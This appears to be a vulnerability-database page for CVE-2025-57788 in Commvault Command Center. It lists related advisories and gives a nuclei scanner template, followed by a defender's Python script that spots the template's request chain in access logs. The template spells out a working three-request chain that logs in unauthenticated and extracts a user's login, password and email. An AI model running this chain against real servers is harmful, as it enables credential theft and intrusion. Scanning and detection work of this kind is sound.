| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2025-57788 | 20 Aug 2025 06:48 | – | circl |
| Commvault Security Vulnerability | 20 Aug 2025 00:00 | – | cnnvd |
| Commvault 11.32.x < 11.32.102 / 11.36.x < 11.36.60 Multiple Vulnerabilities (CV_2025_08_1-4) | 22 Aug 2025 00:00 | – | nessus |
| Commvault CommandCenter < 11.36.60 Unauthorized API Access | 8 Jan 2026 00:00 | – | nessus |
| CVE-2025-57788 | 20 Aug 2025 00:00 | – | cve |
| CVE-2025-57788 Unauthorized API Access Risk | 20 Aug 2025 00:00 | – | cvelist |
| EUVD-2025-25258 | 20 Aug 2025 00:00 | – | euvd |
| Commvault Command-Line Argument Injection to Traversal Remote Code Execution | 17 Sep 2025 18:53 | – | metasploit |
| Vulnerabilities fixed in Commvault | 20 Aug 2025 12:15 | – | ncsc |
| CVE-2025-57788 | 20 Aug 2025 04:16 | – | nvd |

```yaml
id: CVE-2025-57788

info:
  name: Commvault Unauthenticated Password Disclosure (WT-2025-0047)
  author: DhiyaneshDK,iamnoooob,pdresearch,watchtowr
  severity: medium
  description: |
    An issue was discovered in Commvault before 11.36.60. A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials. RBAC helps limit the exposure but does not eliminate risk.
  impact: |
    Unauthenticated attackers can exploit the public sharing login mechanism to access API endpoints and retrieve sensitive user information including passwords.
  remediation: |
    Upgrade Commvault to version 11.36.60 or later that properly restricts API access and removes the vulnerable login mechanism.
  reference:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
    - https://documentation.commvault.com/securityadvisories/CV_2025_08_3.html
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-542502280
  tags: cve,cve2025,commandcenter,commvault,unauth,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /commandcenter/publicLink.do HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: guid
        group: 1
        regex:
          - 'cv-gorkha\\":\\"(.*?)\\"'
        internal: true

    matchers:
      - type: word
        part: body
        words:
          - 'cv-gorkha'
        internal: true

  - raw:
      - |
        POST /commandcenter/api/Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Content-Type: application/json;charset=UTF-8

        {
          "username": "_+_PublicSharingUser_",
          "password": "{{base64(guid)}}"
        }

    matchers:
      - type: word
        part: body
        words:
          - '_+_PublicSharingUser_'
          - 'Public Sharing User'
          - 'token'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - '"token":"(.*?)"'
        internal: true

  - raw:
      - |
        GET /commandcenter/RestServlet/Database/GetUmUserById/1 HTTP/1.1
        Host: {{Hostname}}
        Accept: application/xml
        Authtoken: {{token}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, 'login','email','password','datePasswordSet')
        condition: and

    extractors:
      - type: json
        part: body
        name: password
        json:
          - ".password?"
        internal: true

      - type: json
        part: body
        name: username
        json:
          - ".login?"
        internal: true

      - type: json
        part: body
        name: email
        json:
          - ".email?"
        internal: true

      - type: dsl
        dsl:
          - '"username: " + username + " password:" + password + " email: " + email'
# digest: 4a0a00473045022007cfdbc4b3651d3f134cd65aafad58ab0b4d7c282dbd203b3827c21f2253db8f02210081da3f84706b276884f1312a7a9bc20994619993347bb65888b139f6373eb9f9:922c64590222798bb761d5b6d8e72950
```
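
A defender-side complement to the template above, added here and not part of the nuclei template or of Commvault's tooling: it scans web access logs for a single client walking the template's three requests in order with successful responses. The combined log format (as written by a reverse proxy in front of Command Center), the names `find_chains` and `SAMPLE`, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Method and path of each request in the template's flow: http(1) && http(2) && http(3).
STAGES = [
    ("GET", re.compile(r"^/commandcenter/publicLink\.do")),
    ("POST", re.compile(r"^/commandcenter/api/Login")),
    ("GET", re.compile(r"^/commandcenter/RestServlet/Database/GetUmUserById/\d+")),
]

# Assumption: combined-log-format lines; adjust the pattern to the local log layout.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def find_chains(lines):
    """Return client IPs that completed all three stages, in order, with 2xx responses."""
    progress = defaultdict(int)   # client IP -> index of the next stage expected
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or not m["status"].startswith("2"):
            continue              # unparsable line or rejected request
        ip = m["ip"]
        stage = progress[ip]
        if stage >= len(STAGES):
            continue              # this client has already been reported
        method, path_re = STAGES[stage]
        if m["method"] == method and path_re.match(m["path"]):
            progress[ip] += 1
            if progress[ip] == len(STAGES):
                hits.append(ip)
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [20/Aug/2025:10:00:01 +0000] "GET /commandcenter/publicLink.do HTTP/1.1" 200 5120',
    '198.51.100.4 - - [20/Aug/2025:10:00:02 +0000] "POST /commandcenter/api/Login HTTP/1.1" 200 812',
    '203.0.113.7 - - [20/Aug/2025:10:00:03 +0000] "POST /commandcenter/api/Login HTTP/1.1" 200 790',
    '203.0.113.7 - - [20/Aug/2025:10:00:04 +0000] "GET /commandcenter/RestServlet/Database/GetUmUserById/1 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [20/Aug/2025:10:00:05 +0000] "GET /commandcenter/RestServlet/Database/GetUmUserById/1 HTTP/1.1" 401 120',
]

if __name__ == "__main__":
    for ip in find_chains(SAMPLE):
        print("possible CVE-2025-57788 request chain from", ip)
```

Correlation is by client IP only, so a chain split across several source addresses is not matched; a successful `GetUmUserById` response to any client that should not hold an admin session is worth reviewing on its own.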